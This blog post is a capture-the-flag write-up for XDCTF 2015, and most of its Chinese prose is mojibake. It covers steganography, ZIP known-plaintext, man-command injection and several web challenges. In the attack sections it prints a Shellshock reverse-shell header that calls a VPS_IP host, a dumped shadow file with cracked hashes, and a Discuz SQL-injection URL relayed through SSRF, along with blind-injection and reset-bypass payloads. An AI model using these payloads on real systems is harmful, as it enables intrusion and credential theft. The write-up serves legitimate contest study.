LoRexxar's Blog

XDCTF2015-writeup

2015/10/04

鍒氬垰鎾稿畬鍗佷竴鐨剎dctf锛岃櫧璇存病鑳芥嬁鍒板ソ鐨勫悕璇嶏紝浣嗘槸涓嶇鎬庝箞璇达紝杩樻槸瑙佸埌浜嗗緢澶氬濡欑殑涓滆タ锛屼笉寰椾笉璇磒绁炵殑寰堝涓滆タ杩樿瀛︿範锛岃繕绗竴娆℃帴瑙﹀叧浜巊ithack鐨勪笢瑗匡紝鏈夌┖涓瀹氬ソ濂界爺绌朵笅git.

鍥犱负鑷繁鏈夎兘鍔涘仛鐨勯鐩笉绠楀锛屾墍浠ユ暣鐞嗕笅鎵鏈夐鐩殑writeup锛屼篃璐翠笂涓浜涘埆浜虹殑writeup锛堜镜鍒狅級銆

MISC

xdctf鐨勮糠涔媘isc鍟娾﹀彧鍋氬嚭鏉ヤ竴閬撻锛屾墍浠ヨ创涓婂緢澶氬ぇ绁為槦浼嶇殑writeup

0x01 misc1 鍥剧墖鍔犲瘑锛坆raintools)

鍘熷浘鏄繖鏍风殑
寮濮嬬粰鍑哄浘鐗囨嫋鍘绘瘮瀵癸紝鍙戠幇鍓嶄袱琛屽儚绱犲嚭鐜板樊寮傦紝涔熸病鎵惧埌鏄负浠涔堬紝鐭ラ亾鍚庢潵缁欏嚭鎻愮ず锛屽幓google鍚庢壘鍒拌繖鏍蜂竴涓笢瑗裤
https://github.com/mbikovitsky/BrainTools

涓嬭浇鍚庣紪璇戝緱鍒颁竴涓瞓rainfuck浠g爜锛屾墍浠ョ煡閬撲负浠涔堝墠涓よ鍍忕礌浼氭湁鍑犱綅鐨勫樊寮傘傛嫋鍘诲湪绾跨紪璇戯紝寰楀埌flag锛

0x02 misc2 鍘嬬缉鍖呮槑鏂囨敾鍑

棰樼洰缁欏嚭浜嗛偅涓枃浠讹紝鎻愮ず鏄痾ip锛屾墍浠ユ嬁鍘籦inwalk -e涓涓嬶紝寰楀埌涓や釜zip锛屼竴涓槸鍔犲瘑鐨勪竴涓槸涓嶅姞瀵嗙殑锛屼粩缁嗚瀵熷彂鐜颁袱涓枃浠朵腑閮芥湁涓涓猺eadme.txt鐨刢rc鐩稿悓锛岃鏄庢槸瀹屽叏鐩稿悓鐨勬枃浠讹紝鎵浠ユ兂鍒扮敤鏄庢枃鏀诲嚮銆
杩欓噷鎵惧埌涓涓獁in鐜涓嬮潪甯稿ソ鐢ㄧ殑杞欢Advanced Archive Password Recovery

鎵撳紑閲岄潰鐨刦lag.txt寰楀埌flag.txt

杩欓噷鐪嬪ぇ绁炵殑writeup锛岃繕鐪嬪埌涓涓懡浠よ涓嬬殑宸ュ叿pkcrack

0x03 misc3 鍥剧墖闅愬啓+zlib鍔犲瘑

鍘熷浘鍦ㄨ繖閲岋紝閭e幓鍒嗘瀽鍙戠幇鏈宸﹁竟鏈変竴鍒楁槑鏄剧殑鍍忕礌宸紓锛屼絾鏄畬鍏ㄦ病鏈夋兂娉曠炕璇戞垚01涔熸病鍔炴硶缁勬垚鍚堢悊鐨勫彞瀛愶紝鐜板湪璐翠笂澶х鐨刾y鍒嗘瀽鑴氭湰锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
>>> import Image
>>> a=Image.open('zxczxc.png')
>>> a.point(lambda i: 255 if i&1 else 0).show()
>>> for i in xrange(100):
... print a.getpixel((0,i))
...
(252, 255, 254)
(253, 252, 255)
(254, 252, 252)
(254, 253, 254)
(252, 255, 253)
(252, 253, 254)
(253, 254, 252)
(254, 252, 255)
(253, 255, 253)
(252, 253, 254)
(254, 253, 252)
(254, 253, 253)
(253, 254, 253)
(252, 253, 254)
(252, 255, 252)
...

鏍规嵁澶х鐨勮娉曪紝杩欓噷鐪嬪嚭鍍忕礌宸紓鎵浠ョ敤鏈鍚庝袱浣嶈棌鏁版嵁锛屼簬鏄寜鐓у儚绱犻『搴忋丷GB椤哄簭銆佸掓暟绗簩绗竴鐨勯『搴忔帓鍒楃殑01涓诧紙鍘熻皡鎴戠湅涓嶆噦杩欏彞璇濓紝py涔熸病鐜╄繃鍥剧墖锛屾墍浠ョ湅涓嶆噦澶х鐨勮剼鏈級

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
>>> s=''
>>> for i in xrange(165):
... p=a.getpixel((0,i))
... for k in xrange(3):
... s+='1' if p[k]&2 else '0'
... s+='1' if p[k]&1 else '0'
...
>>> s
'0011100100111000001001100011010001100110001000110111010001101001001001010110010001100011001100100011000100110000001011100011001>>> def tostr(s):
... ret=''
... for i in xrange(0, len(s), 8):
... ret+=chr(int(s[i:i+8],2))
... return ret
...
>>> tostr(s)
'98&4f#ti%dc210.27.10.195-2015-09-16T05:21:52+02:0098&4f#ti%dcx\xda\xabHI.I\xab..1NO\xcc3H/2)\
>>>

鍙互鐪嬪埌閲岄潰鏈変竴涓瞚p鍜屾椂闂达紝鍚庨潰鐪嬪埌x\xda澶达紝浜庢槸鍙戠幇鏄痾lib compressed,浜庢槸

1
2
3
>>> import zlib
>>> zlib.decompress('x\xda\xabHI.I\xab..1NO\xcc3H/2)\xc8\xa8\xd4M\xcdK6H1\xd657\xae(\xd15\xcc
'xdctf{st3gan0gr4phy-enc0d3-73xt-1nto-1m4ge}'

Get flag!

0x04 misc4

0x05 misc5 man鍛戒护琛屾敞鍏

闈炲父闀胯璇嗙殑涓閬撻鐩紝浠ュ墠浠庢病瑙佽繃杩欐牱鐨勪笢瑗匡紝棣栧厛nc杩炰笂鏈嶅姟鐪嬪埌鎻愮ず
Do you know what鈥檚 the most useful command in linux?
绠鍗曟祴璇曚簡涓嬶紝鍙戠幇涓ょ偣锛
1銆侀氳繃杈撳叆 [f-z]浼氱垎鑰孾g-z]涓嶄細鐖嗭紝鍙戠幇搴旇鏄痜lag鏂囦欢锛堜簨瀹炶瘉鏄庢槸flag?锛
2銆佽緭鍏an鍛戒护鏈夋晥

浠旂粏鐧惧害浜唌an鍛戒护锛屽彂鐜癿an -P xxx man,鍙互璇诲彇xxx鐨勬枃浠
鎵浠ョ炕浜嗙炕鍙戠幇浜/etc/passwd /etc/shadow
鍙戠幇瀛樺湪/home/ctf 杩樻湁涓涓/home/neighbor-old-wang锛堝悗闈㈠彂鐜拌繕瑕佸洖鍒拌繖閲岋級
浜庢槸寮濮嬬炕/home/ctf锛岃繖鏃跺欏洜涓烘病鏈夋洿澶氫俊鎭紝鑰屼笖涓嶈兘鎵ц鍒殑鍛戒护锛屾墍浠ヤ粛鐒舵病鏈夋敹鑾凤紝浣嗘槸鏃犳剰闂村彂鐜帮細

1
man /home/ctf/.viminfo

閲岄潰寰楀埌涓涓湁鏁堜俊鎭槸瀛樺湪涓涓猲c_test.sh,浜庢槸

1
/home/ctf/nc_test.sh

寰楀埌浜嗛噸瑕佷俊鎭紝寰楃煡man -P 鈥榣s鈥 ls锛岃繖鏍峰彲浠ユ墽琛屽懡浠わ紝浜庢槸鍙戠幇flag锛熺洰褰曪紝鎵撳紑鐪嬪埌.flag锛屾墦寮寰楀埌淇℃伅鍦ㄩ殧澹佽佺帇閭i噷锛屼絾鏄痭eighbor-old-wang闇瑕佹潈闄愶紝浜庢槸鍩烘湰鍗″湪浜嗚繖閲岋紝鐒跺悗misc500灏卞穿浜嗭紝涓嬮潰璐翠笂澶х鐨勬濊矾锛屽墠闈㈠熀鏈浉鍚屻

瀹冧滑鍙戠幇鎵цman -P set & 鍙互鐪嬪埌绋嬪簭鐩稿叧鐨勯昏緫浠g爜锛

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
check_lenth ()
{
count=$(echo $1 | wc -m);
if [[ $count -gt $2 ]]; then
echo "Argument too long, 40 limit.";
exit 2;
fi
}
clean_up ()
{
if [[ -z $chat_room ]]; then
cat bye;
exit;
else
echo -e "\033[1;34m$msg_date\033[0m\033[1;31m $username
\033[0m\033[1;34mleaved room\033[0m \033[1;36m \"$room_name\"
\033[0m" >> $chat_room;
cat bye;
exit;
fi
}
hander ()
{
m_cmd=$1;
m_option=$2;
m_selfcmd=$@;
if [[ $m_cmd == 'man' ]]; then
if [[ $m_option == '-P' ]]; then
if [[ -n `echo $m_selfcmd | grep "\""` && `echo $m_selfcmd
| cut -d "\"" -f 3` != '' ]]; then
m_selfcmd=`echo $m_selfcmd | cut -d "\"" -f 2`;
else
if [[ -n `echo $m_selfcmd | grep "'"` && `echo $m_selfcmd
| cut -d "'" -f 3` != '' ]]; then
m_selfcmd=`echo $m_selfcmd | cut -d "'" -f 2`;
else
if [[ $3 == '' ]]; then
echo "man: option requires an argument -- 'P'
Try 'man --help' or 'man --usage' for more information.";
fi;
[[ $4 != '' ]] && m_selfcmd=$3 || echo "What manual
page do you want?";
fi;
fi;
if [[ $m_selfcmd == 'whoami' ]]; then
echo "root";
else
if [[ -n `echo $m_selfcmd | grep -E
"vim|vi|sh|kill|pkill|socat|nc|ncat|nmap|rm|chmod|passwd|etc|root|exp
ort|PATH"` ]]; then
echo "No way.";
else
`$m_selfcmd > m_return` &> /dev/null;
cat m_return;
fi;
fi;
else
if [[ $m_option != '' ]]; then
if [[ `man $m_option` == '' ]]; then
echo "man: option requires an argument --
'$m_option'
Try 'man --help' or 'man --usage' for more information.
";
else
`man $m_option > tmp` &> /dev/null;
cat tmp;
fi;
else
echo "What manual page do you want?";
fi;
fi;
else
echo "invalid command";
fi
}

(濡堜簡涓浮锛岀缉杩涜鐙楀悆浜)鍒嗘瀽浠g爜鍚庡彂鐜板彲浠ョ敤man -P 鈥滃懡浠も &鐨勬柟寮忔墽琛屼换鎰忓懡浠(鍓嶆彁鏄懡浠ゅ唴瀹
涓嶈兘鍖呭惈:vim|vi|sh|kill|pkill|socat|nc|ncat|nmap|rm|chmod|passwd|etc|root|export|PATH 杩欎簺瀛楁)

杩欓噷鏍规嵁鎴戝墠闈㈢殑鍒嗘瀽锛屽彂鐜板湪tmp鐩綍涓嬫湁涔嬪墠杈撳叆鐨勪笢瑗跨殑缂撳瓨淇濈暀涓嬶紝杩欐牱鍙互閫氳繃杩欐牱鐨勬柟寮忔墽琛岃剼鏈紝澶х鐨勬濊矾杩樻槸鎵撳紑鏌ョ湅/etc/shadow

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root:$6$ZuPfdsng$eN.xStmAbo5SCRQm9bHpA6wtrZisadNJn9lOE./2ks3C.vUVxnKJ
AUIZM6PA7IEphcTgOzo4wOBz.wwD9CSDJ1:16709:0:99999:7:::
daemon:*:16661:0:99999:7:::
bin:*:16661:0:99999:7:::
sys:*:16661:0:99999:7:::
sync:*:16661:0:99999:7:::
games:*:16661:0:99999:7:::
man:*:16661:0:99999:7:::
lp:*:16661:0:99999:7:::
mail:*:16661:0:99999:7:::
news:*:16661:0:99999:7:::
uucp:*:16661:0:99999:7:::
proxy:*:16661:0:99999:7:::
www-data:*:16661:0:99999:7:::
backup:*:16661:0:99999:7:::
list:*:16661:0:99999:7:::
irc:*:16661:0:99999:7:::
gnats:*:16661:0:99999:7:::
nobody:*:16661:0:99999:7:::
libuuid:!:16661:0:99999:7:::
syslog:*:16661:0:99999:7:::
neighbor-old-wang:$6$5/yy2vJZ$Xp1MZOp4D5squxZLmgN4TLV5ktfUP2LD5Rp6l07
lzyUCEES97px/a1EoIM8ZjygGrXdUDYGcoD9lGiCigosdI/:16710:0:99999:7:::
ctf:$6$tcSIbi8j$lDog8sNj0U0m.LuAy8u/MRInv9UP33HQTcPhvHFfSTgDajN.4HGJo
pG1PKMqOYVE7MdhDSlN6K/4DzNrEhy5D1:16709:0:99999:7:::
sshd:*:16701:0:99999:7::

鎶婅繖涓涪鍒癹oin閲岄潰璺戜竴涓嬪緱鍒伴殧澹佽佺帇鐨勫瘑鐮佹槸666666锛堟垜鎬庝箞灏辨病鐪嬪嚭鏉ャ傘傘傦級

ssh 杩炰笂涔嬪悗鏌ョ湅.bash_history 鏂囦欢
鍙戠幇璁╀粠www.flag.com 閲岄潰鎵緁lag,
浠/etc/hosts 閲屽彂鐜皐ww.flag.com 鎸囧悜鐨172.17.0.1
鑰屾湰鏈烘槸172.17.0.4 涓嶆槸涓鍙版満鍣
浜庢槸curl www.flag.com

1
2
3
4
5
6
7
8
function status() {
$.getJSON("/cgi-bin/status", function (data) {
$.each( data, function( key, val ) {
$('#infos').append ( "<li><b>"+key+"</b>: " + val +
"</li>" );
});
});
}

鐪嬪埌/cgi-bin/status,鎰熻鏄疭hellshock 婕忔礊,浜庢槸
curl -H 鈥榵: () { :;}; /bin/bash -i >& /dev/tcp/VPS_IP/8899 0>&1鈥http://www.flag.com/cgi-bin/status
鎴愬姛寰楀埌绗簩鍙颁富鏈虹殑shell
cat /etc/passwd 寰楀埌鏈缁坒lag:
xdctf{where_there_is_a_shell_there_is_a_way}

WEB1

web1 phpjm鍔犲瘑

棰樼洰绠鐩村氨鏄釜鍧戯紝鎵撳紑鐨勯〉闈㈠氨鏄竴涓叧浜巑d5鐨勬弿杩帮紝杩樻湁涓涓猼est锛岀湅浜嗗彉澶╂棤鏋滐紝鏃犳剰闂村彂鐜癷ndex.php~锛実et婧愮爜锛屽彂鐜版椂phpjm鍔犲瘑锛屼簬鏄壘鍒扮綉绔
http://tool.lu/php/
瑙e瘑鍙戠幇鍙璁﹎d5鍔犲瘑杩囩殑绛変簬0灏卞ソ锛岃繖鏍风敤鍒颁釜榛戦瓟娉曪細
md5(鈥240610708鈥) 鈥榮 result is 0e462097431906509019562988736854.

md5(鈥楺NKCDZO鈥) 鈥榮 result is 0e830400451993494058024219903391.

0e鍦╬hp涓細琚瘑鍒负0鐨勬鏂癸紝浜庢槸get flag!

web2 Apache Tomcat session鎿嶇旱婕忔礊

杩欓鐩鎴戠煡閬撲簡涓涓柊鐨勪笢瑗匡紝棣栧厛缈讳簡缈婚〉闈㈡簮鐮侊紝寰楀埌瀛樺湪examples鐩綍锛屾壘鍒版浘缁忔湁璇磋繃tomcat鐨別xamples鐩綍涓嬪瓨鍦ㄤ竴涓枃浠跺彲浠ヤ慨鏀逛换鎰弒ession銆
/examples/servlets/servlet/SessionExample
杩涘幓鎶妉ogin=true
user=Administrator鍐嶈繑鍥炵櫥褰曠晫闈㈠氨鍙互get flag浜

web3 LFI+SSRF+SQLI

棰樼洰缈荤炕鍙戠幇浜嗕换鎰忔枃浠惰鍙栨紡娲烇紝浜庢槸鎵惧埌锛

1
http://133.130.90.188/?link=file://index.php

寰楀埌婧愮爜

1
<?php if (isset($_GET['link'])) { $link = $_GET['link']; // disable sleep if (strpos(strtolower($link), 'sleep') || strpos(strtolower($link), 'benchmark')) { die('No sleep.'); } if (strpos($link,"http://") === 0) { // http $curlobj = curl_init($link); curl_setopt($curlobj, CURLOPT_HEADER, 0); curl_setopt($curlobj, CURLOPT_PROTOCOLS, CURLPROTO_HTTP); curl_setopt($curlobj, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($curlobj, CURLOPT_TIMEOUT, 5); $content = curl_exec($curlobj); curl_close($curlobj); echo $content; } elseif (strpos($link,"file://") === 0) { // file echo file_get_contents(substr($link, 7)); } } else { echo<<<EOF <!--浣犵瀰鍟--> <br><br><br> <center> <h1>What do you want to read?</h1> <form method="GET" action="#"> <input style="width:300px; height:25px;" name="link" value="" /> <button style="height:25px;" type="submit">Read</button> </form> </center> EOF; } ?>

璇诲彇婧愮爜鍙戠幇鍙互鍐呯綉ssrf锛堣彍楦¤〃绀哄苟娌℃湁鐪嬪嚭鏉ワ級
缈荤炕鏂囦欢鍙戠幇/etc/host閲岄潰鏈変釜鍩熷悕
9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com
鎵笅绔彛鍙戠幇
http: //9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com:3389
鍙戠幇鏄竴涓狣iscuz璁哄潧锛岀湅鐗堟湰鏄7.2锛岀劧鍚庡幓鐧惧害锛屽彂鐜板瓨鍦ㄦ敞鍏ョ偣锛屼簬鏄紝
payload:

1
http://133.130.90.188/?link=http%3A%2F%2F9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com%3A3389%2Ffaq.php%3Faction%3Dgrouppermission%26gids%5B99%5D%3D%2527%26gids%5B100%5D%5B0%5D%3D%29%2Band%2B%28select%2B1%2Bfrom%2B%28select%2Bcount%28*%29%2Cconcat%28%28select%2B%28select%2B%28select%2Bconcat%28username%2C0x27%2Cpassword%29%2Bfrom%2Bcdb_members%2Blimit%2B1%29%2B%29%2Bfrom%2Binformation_schema.tables%2Blimit%2B0%2C1%29%2Cfloor%28rand%280%29*2%29%29x%2Bfrom%2Binformation_schema.tables%2Bgroup%2Bby%2Bx%29a%29%2523%23#

1
http://133.130.90.188/?link=http://9bd5688225d90ff2a06e2ee1f1665f40.xdctf.com:3389/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)+and+(select+1+from+(select+count(*),concat((select+(select+(select+concat(username,0x27,password)+from+cdb_members+limit+1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23##

get flag!

web4 sqli

杩涘叆椤甸潰缈荤炕婧愮爜鍙互寰楀埌鎻愮ず锛

浜庢槸鍙戠幇鍥剧墖瀛樺湪娉ㄥ叆鐐癸紝鐢 ID 娉ㄥ叆鍚庢灉鐒跺氨鍙互鏀瑰彉浜嗭紝浣嗘槸寰堝涓绘祦鐨勫嚱鏁板 select,substr,union,left,right,midselect,substr,union,left,right,mid 绛夐兘琚繃婊や簡锛屾棤濂堝皾璇曞埆鐨勪笢瑗匡紝鍙戠幇鏈変竴涓猯pad鍑芥暟鍙互浣跨敤bool鐩叉敞銆
缁撴灉鍙戠幇瀛樺湪username=admin,浜庢槸寮濮嬭窇password

1
/47bce5c74f589f4867dbd57e9ca9f808/Picture.php?ID=2"%20or%20lpad(password,21,space(1))=0x3538333266343235316362366634333931376466%23

寰楀埌瀵嗙爜鏄20涓虹殑md5锛屾墍浠ヨ繕瑕佸垹鍑忥紝鎸夌収澶х墰鐨勮娉曞氨鏄寽娴嬩负dedecms鍔犲瘑鏂瑰紡锛屾墍浠ュ幓鎺夊墠3鍚1锛岃В瀵嗗緱鍒板瘑鐮侊紝鏄庢枃鐧诲綍鍗冲彲鎵惧埌flag

鍙戠幇浜嗕竴涓墰閫肩殑lpad鍑芥暟锛屼竴浼氬効涓撻棬鐮旂┒杩囨斁鍦ㄤ笓闂ㄧ殑鍗氬閲岄潰銆

web2

web2鏄痯鐗涘啓鐨刢ms锛屾紡娲為兘鏄ぇ鐗涘疄鎴樹腑閬囧埌鐨勶紝杩欓噷涔熸槸闀胯璇嗕簡銆
棰樼洰鏄繖鏍风殑锛

web2 git婧愮爜娉勯湶

杩欓亾棰樼殑鍏ュ彛鍏充簬git婧愮爜娉勯湶瀹屽叏鏄竴涓病鎺ヨЕ杩囩殑涓滆タ锛岃繖閲屼篃绠楁槸闀夸簡瑙佽瘑锛岀櫨搴ithack锛屽彂鐜颁簡涓涓伐鍏峰彨Githack,鎸夌収p鐗涜嚜宸卞啓鐨剋riteup锛岃繖閲屽彧鑳藉緱鍒皉eadme.md
鐒跺悗寰楀埌鎻愮ず锛All source files are in git tag 1.0
杩欐牱鍙互鎺ㄧ悊寰楀埌褰撴椂鏃堕洦鐨勫伐浣滈『搴忥細
git init
git add
.
git commit
git tag1.0
git rm 鈥搑f*
echo
鈥淎ll source files are in git tag 1.0鈥 >README.md
git add .
git commit

浜庢槸鐪熸鐨勬簮鐮佸湪tag==1.0 鐨刢ommit涓

杩欓噷鏍规嵁git鐨勭洰褰曠粨鏋勶紝鎵惧埌/.git/refs/tags/1.0 杩欎釜鏂囦欢鍏跺疄鏄痗ommit鐨勪竴涓摼鎺ワ紝閲岄潰鍙戠幇涓涓猦ash锛屽彂鐜版椂涓涓猻ha1鐨刢ommondid銆
璇村疄璇濓紝杩欓噷鍚庨潰p绁炵殑鍒嗘瀽鎴戝氨鐪嬩笉澶噦浜嗭紝鎵浠ヨ繖閲屾寕涓婄綉鐩樺湴鍧锛屾湁鏈轰細鍙互缁х画鐮旂┒
http://pan.baidu.com/s/1kTq3Ceb 瀵嗙爜涓2ep2
閲岄潰鎻愬埌鐨刾y鑴氭湰瀵嗙爜涓簂4l8

鎴戜滑杩欓噷鐢ㄧ殑鏂规硶鏄痳ip-git.pl 鍘绘嫋婧愮爜锛屽緱鍒颁笂闈㈣鐨剆ha1鍔犲瘑鐨刪ash涔嬪悗锛屾浛鎹㈢殑鎺.git/refs/heads/master 鐨刪ash銆傜劧鍚$ git checkout -f
寰楀埌婧愮爜
http://pan.baidu.com/s/1i30bgcX 瀵嗙爜gakj

web1 鍓嶅彴瀵嗙爜鎵惧洖閫昏緫婕忔礊

鍦ㄥ畼鏂圭粰鍑篽it涔嬪墠锛屽璁′唬鐮佸悗鍙戠幇鍦/xdsec_app/front_app/controllers/Auth.php閲岄潰鐨勬湁楠岃瘉鐮佺殑鍑芥暟锛

1
2
3
4
5
6
7
8
9
10
11
public function handle_resetpwd()
{
if(empty($_GET["email"])||empty($_GET["verify"]))
{
$this-颅鈥>error("Badrequest",site_url("auth/forgetpwd"));
}
$user=$this-颅鈥>user-颅鈥>get_user(I("get.email"),"email");
if(I('get.verify')!=$user['verify'])
{
$this-颅鈥>error("Your verify code is error",site_url('auth/forgetpwd'));
}

鎵浠ユ瀯閫
http://xdsec-cms-12023458.xdctf.win/index.php/auth/resetpwd?email=xdsec-颅cms@xdctf.com&verify[1]=aa
杩欓噷鏈変釜寰堝ぇ鐨勫潙鏄偖绠卞苟涓嶆槸p绁炵殑閭锛屾槸棣栭〉涓啓鍒扮殑鐗堟潈澹版槑閲岄潰鐨勯偖绠

web3 浠g爜瀹¤+鐩叉敞

web4 getshell

web棰樼洰鍒颁簡杩欓噷宸茬粡鏄垜鎺ヨЕ涓嶆噦鐨勭骇鍒簡锛屾墍浠ヨ繖閲岃繕鏄寕涓妏绁炵殑writeup鐒跺悗锛屾湁鏈轰細鍐嶇爺绌躲
300鐨瀵嗙爜锛0m33
閲岄潰鎻愬埌鐨刾y娉ㄥ叆鑴氭湰瀵嗙爜锛歲pys
400鐨瀵嗙爜锛歫xbo

CRYPTO

璋滀竴鏍风殑crypto,涓嶇鎬庝箞鏍凤紝杩欓噷璐翠笂crypto100鐨勮В娉

crypto100 澶у啓瀛楁瘝playfair鍔犲瘑

瀵嗘枃锛

1
HQPEAGEPHQQUAEGQCEAGYSRUHAGPAIWNAPLONGDRZRIEEMQHOYGPOVRIBLQNALOBDPNKRPAZRACOORWRLCLOTBLUMRIABOESOFBOHQROAOENLUHQRWRDDPGUHCGPNOQLAGGBKBPGNEENLNNGEQIRARCLQDBEPDZXRACOORWRLCLOTBLUMRIABOESOFBOQNLCUARPQKAGWZZEHQHQRGTBEMOINGCPCWPIATWWQAOGRUESAMRUMEQCGPGUAPBYNGHQPGEMGXBWOBUCHQPGQAPIUQHCGPDRDPLOEAATWWQAALOBDPNKRPCTYBQOOGQBGPORFEQUDTULDFSARIPDZLNKENGDUKBEIPEFGPKKQAWGEBEFPEQOAERACOORWRLCLOTBLUMRIABOESOFBOQNCFMPIBEPOCEPQBERBBIANGHQPRLNPIGKXXCTUCENMMIANGHQPRICEMURBXKLULFOZZBTDPOFGNEVMPAPUQSRZXRACOOQBDLOTBLUMRIABOESOFBOCOAOENRUUDZZLUULBBRDCOOQCXQAAGUCCOAOENRUORXZNESKPIRPWRQKPGBOOQHQRUHGNEXGRDQHNWQAROQOWEAGEPOQBQTBLUMRIACOAZAERIRSQAALOBDPNKRPMZQCRIDZQBRDPESEBYAUVOIRGLEGAPLNCOCIEMQHAWNUORZZIRGLDGEMQHLYCPAGUDDGOQDQUFRUCMSIHQTBUQGINGWSQMCWRAUGPGPEAWQDNGFEAGKKERBEOBUCCPLDSITBEUOUUQGINGWSQMCWRAUGRGEPQKNCUGOCAAWEEDRIARDDOBUCUQGINGWSQMCWRAUGRGENGDEPBOXGPELWQNPNOIQBSNLOCHNENCTTAUKIRGBXQNDTKKPEIAKLHQLOAQIFUQHRPEOLDNDPQOCOBUBTQQPEIAKLHQAERUBUNGEQIRARCLQDBEPDIIQNGTWRALROHQRWPAPECOUQNFEPTBRZLONMGREROFANQCRUOIAQEWLFZEHQHQRGDEHQHQTBNOAGCVIAUNOOPERUMENLIAIGTHRZAOSATAHBUGLUULZZRLLROWDTBFAQBETDDGGOSATAHBQUQNHQATENIROCOWDTBFAQOANEMEGOSATAHBSEQNLUEDOCOWDTBFAQHQLOISKUCOAMGPKKQUNGQNCVNEHQPEVFPDRPYSOQZEOFHQTBUQGIGQXAMPZZPDODDPQOATOCUCZEDDALTFCOOATZCACHROEUXLEBVKDEPV

鐪嬪埌杩欎箞涓闀夸覆澶у啓瀛楁瘝鐩存帴钂欎簡銆傘傘傝繖浠涔堝晩锛屽悗鏉ョ湅鍒皐riteup锛屽悗鏉ュ彂鐜拌繕鏄範鎯笉濂斤紝濡傛灉鍘荤櫨搴﹀ぇ鍐欏瓧姣 鍔犲瘑锛屽氨寰楀埌涓嬮潰鐨勶細
Playfair瀵嗙爜锛堣嫳鏂囷細Playfair cipher 鎴 Playfair square锛夋槸涓绉嶆浛鎹㈠瘑鐮侊紝1854骞寸敱鏌ュ皵鏂锋儬鏂氾紙Charles Wheatstone锛夌殑鑻卞浗浜哄彂鏄庛傜幇鏃讹紝娉㈤浄璐瑰瘑鐮佽瑙嗕负鍗佸垎涓嶅畨鍏ㄧ殑銆

缂栧啓瀵嗘枃:
1銆侀夊彇涓涓嫳鏂囧瓧浣滃瘑閽ャ傞櫎鍘婚噸澶嶅嚭鐜扮殑瀛楁瘝銆傚皢瀵嗗寵鐨勫瓧姣嶉愪釜閫愪釜鍔犲叆5脳5鐨勭煩闃靛唴锛屽墿涓嬬殑绌洪棿灏嗘湭鍔犲叆鐨2鑻辨枃瀛楁瘝渚漚-z鐨勯『搴忓姞鍏ャ傦紙灏咺鍜孞瑙嗕綔鍚屼竴瀛椼侸OY -> IOY锛
2銆佸皢瑕佸姞瀵嗙殑璁伅鍒嗘垚涓や釜涓缁勩傝嫢缁勫唴鐨勫瓧姣嶇浉鍚岋紝灏 X 鍔犲埌璇ョ粍鐨勭涓涓瓧姣嶅悗锛岄噸鏂板垎缁勩傝嫢鍓╀笅涓涓瓧锛屼篃鍔犲叆 X 瀛椼傦紙ee st um p->EX ES TU MP锛夈
3銆佸湪姣忕粍涓紝鎵惧嚭涓や釜瀛楁瘝鍦ㄧ煩闃典腑鐨勫湴鏂广
4銆佽嫢涓や釜瀛楁瘝鍚屽垪锛屽彇杩欎袱涓瓧姣嶄笅鏂圭殑瀛楁瘝锛堣嫢瀛楁瘝鍦ㄦ渶涓嬫柟鍒欏彇鏈涓婃柟鐨勫瓧姣嶏紝PB->IK锛孊T->KP锛夈
5銆佽嫢涓や釜瀛楁瘝鍚岃锛屽彇杩欎袱涓瓧姣嶅彸鏂圭殑瀛楁瘝锛堣嫢瀛楁瘝鍦ㄦ渶鍙虫柟鍒欏彇鏈宸︽柟鐨勫瓧姣嶏級銆
6銆佽嫢涓や釜瀛楁瘝涓嶅悓琛屼篃涓嶅悓鍒楋紝鍦ㄧ煩闃典腑鎵惧嚭鍙﹀涓や釜瀛楁瘝锛屼娇杩欏洓涓瓧姣嶆垚涓轰竴涓暱鏂瑰舰鐨勫洓涓锛圚I->BM锛夈
7銆佹柊鎵惧埌鐨勪袱涓瓧姣嶅氨鏄師鏈殑涓や釜瀛楁瘝鍔犲瘑鐨勭粨鏋溿

浜庢槸鍙戠幇杩欐牱涓涓綉鍧
http://www.cs.miami.edu/home/burt/learning/Csc609.051/programs/playn/
瑙e瘑涓嶅お鍑嗙‘锛屽ぇ鑷寸湅鍑烘槸i Have a dream 淇敼涓媑et flag!

CATALOG
  1. 1. MISC
    1. 1.1. 0x01 misc1 鍥剧墖鍔犲瘑锛坆raintools)
    2. 1.2. 0x02 misc2 鍘嬬缉鍖呮槑鏂囨敾鍑
    3. 1.3. 0x03 misc3 鍥剧墖闅愬啓+zlib鍔犲瘑
    4. 1.4. 0x04 misc4
    5. 1.5. 0x05 misc5 man鍛戒护琛屾敞鍏
  2. 2. WEB1
    1. 2.1. web1 phpjm鍔犲瘑
    2. 2.2. web2 Apache Tomcat session鎿嶇旱婕忔礊
    3. 2.3. web3 LFI+SSRF+SQLI
    4. 2.4. web4 sqli
  3. 3. web2
    1. 3.1. web2 git婧愮爜娉勯湶
    2. 3.2. web1 鍓嶅彴瀵嗙爜鎵惧洖閫昏緫婕忔礊
    3. 3.3. web3 浠g爜瀹¤+鐩叉敞
    4. 3.4. web4 getshell
  4. 4. CRYPTO
  5. 5. crypto100 澶у啓瀛楁瘝playfair鍔犲瘑